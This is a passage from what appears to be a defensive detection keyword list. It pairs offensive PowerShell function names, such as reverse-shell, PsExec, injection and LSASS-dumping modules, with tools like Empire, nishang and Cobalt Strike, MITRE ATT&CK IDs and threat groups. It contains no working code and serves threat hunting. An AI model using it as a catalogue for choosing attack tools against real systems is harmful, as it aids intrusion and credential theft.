post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1057,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PowerDump*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-PowerExtract*,offensive_tool_keyword,powerextract,This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process,T1003 - T1055 - T1003.001 - T1055.012,TA0007 - TA0002,N/A,N/A,Credential Access,https://github.com/powerseb/PowerExtract,1,1,N/A,N/A,1,99,14,2023-07-19T14:24:41Z,2021-12-11T15:24:44Z -*Invoke-PowerShellHistoryCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-PowerShellIcmp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellIcmp.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellTcp*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PowerShellTcp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red 
teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellTcp.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PowerShellTcp.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellTcpOneLine*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellTcpOneLine.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellTcpOneLineBind*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowershellTranscriptionCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-PowerShellUdp*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellUdp.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellUdpOneLine*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerShellUdpOneLine.ps1*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,1,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -*Invoke-PowerShellWmi*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PowerThIEf*,offensive_tool_keyword,Invoke-PowerThIEf,An IE Post Exploitation Library released at Steelcon in Sheffield 7th July 2018.,T1027 - T1053 - T1114 - T1059 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Credential Access,https://github.com/nettitude/Invoke-PowerThIEf,1,0,N/A,N/A,2,127,27,2018-09-12T11:26:06Z,2018-07-10T09:14:58Z -*Invoke-PPLDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Prasadhak*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PrintDemon*,offensive_tool_keyword,Invoke-PrintDemon,This is an PowerShell Empire launcher PoC using PrintDemon and Faxhell. The module has the Faxhell DLL already embedded which leverages CVE-2020-1048 for privilege escalation. 
The vulnerability allows an unprivileged user to gain system-level privileges and is based on @ionescu007 PoC.,T1204 - T1208 - T1216 - T1055 - T1203,TA0001 - TA0007 - TA0004 - TA0005,N/A,N/A,Exploitation tools,https://github.com/BC-SECURITY/Invoke-PrintDemon,1,1,N/A,N/A,2,193,41,2020-10-17T17:04:24Z,2020-05-15T05:14:49Z -*Invoke-PrintNightmareCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Privesc*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-PrivescAudit*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-PrivescCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PrivescCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-PrivescCheck.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*invokeprocesshunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-ProcessHunter*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-ProcessHunter*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-processhunter*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-ProcessScan*,offensive_tool_keyword,Invoke-ProcessScan,This script uses a list from the Equation Group leak from the shadow brokers to provide context to executeables that are running on a system.,T1059.001 - T1016 - T1547.001,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/vysecurity/Invoke-ProcessScan,1,1,N/A,N/A,1,42,22,2017-06-05T12:19:25Z,2017-06-03T18:36:30Z -*InvokePS1.bat*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*Invoke-ps2exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*Invoke-PSAmsiScan*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*Invoke-PsExec*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PsExec.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PSexec.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-PsExec.ps1*,offensive_tool_keyword,empire,Empire 
scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1095,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*invoke-psexecpayload*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - 
T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-PsGcat*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PsGcatAgent*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PSImage*,offensive_tool_keyword,Invoke-PSImage,Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to executenInvoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.,T1027 - T1218 - T1216 - T1059,TA0002 - TA0008 - TA0007,N/A,N/A,Defense Evasion,https://github.com/peewpw/Invoke-PSImage,1,0,N/A,N/A,10,2075,401,2019-09-23T15:17:03Z,2017-12-17T18:41:44Z -*Invoke-PSInject*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PSInject.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1085,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-PsUACme*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,1,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*Invoke-PsUACme*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Invoke-PsUACme*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-Pwds.ps1*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,1,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*Invoke-RBDC*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-RBDC-over-DAVRPC*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z 